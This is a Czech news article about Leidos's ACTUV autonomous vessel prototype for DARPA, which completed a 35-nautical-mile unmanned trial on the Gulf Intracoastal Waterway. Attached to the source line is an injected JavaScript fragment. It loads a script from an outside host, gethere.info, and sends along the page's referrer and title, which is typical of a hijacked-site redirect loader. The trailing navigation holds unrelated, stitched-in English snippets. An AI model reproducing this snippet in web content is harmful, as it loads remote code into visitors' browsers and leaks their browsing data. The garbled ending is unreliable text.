USV

Autonomní systém ACTUV dokončil svoji první plavbu

Společnost Leidos oznámila, že její prototyp námořního autonomního systému, vyvíjený pro DARPA v rámci programu protiponorkového boje ACTUV (Anti-Submarine Warfare Continuous Trail Unmanned Vessel), nedávno dokončil svoji první poznávací plavbu mezi Gulfportem a Pascagoulou v Mississippi.

Prototyp autonomního systému byl instalován na 13metrovém plavidle, které slouží jako záložní loď pro testování senzorů, ovladatelnosti a operační způsobilost prototypu plavidla ACTUV. Cílem programu ACTUV je vývoj samostatně operujícího, dálkově řízeného bezosádkového plavidla, pracujícího pod minimální kontrolou operátora a bezpečně se řídící „pravidly moře“ pro prevenci kolize známými jako COLREGS.

Řízené pouze autonomním systémem, navigačními mapami oblasti uloženými v paměti a vstupy z COTS radarů, proplulo plavidlo složitým prostředím Gulf Intracoastal Waterway (wikipedia). Během plavby dlouhé 35 námořních mil se úspěšně vyhnulo všem překážkám, bójím, pevninám, mělčinám a ostatním plavidlům, bez jakéhokoliv lidského zásahu.

Zatímco loď bude i nadále využíváno pro testování softwaru a senzorů ACTUV, společnost pokračuje ve stavbě plavidla Sea Hunter, prvního ACTUV prototypu, který by měl být dokončen na podzim tohoto roku a krátce poté by měly být zahájeny jeho zkoušky.

zdroj: Leidoss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Předchozí článek

I always tell my clients give it two years

Další článek

11, 2001, attacks when the men at Guantanamo were taken into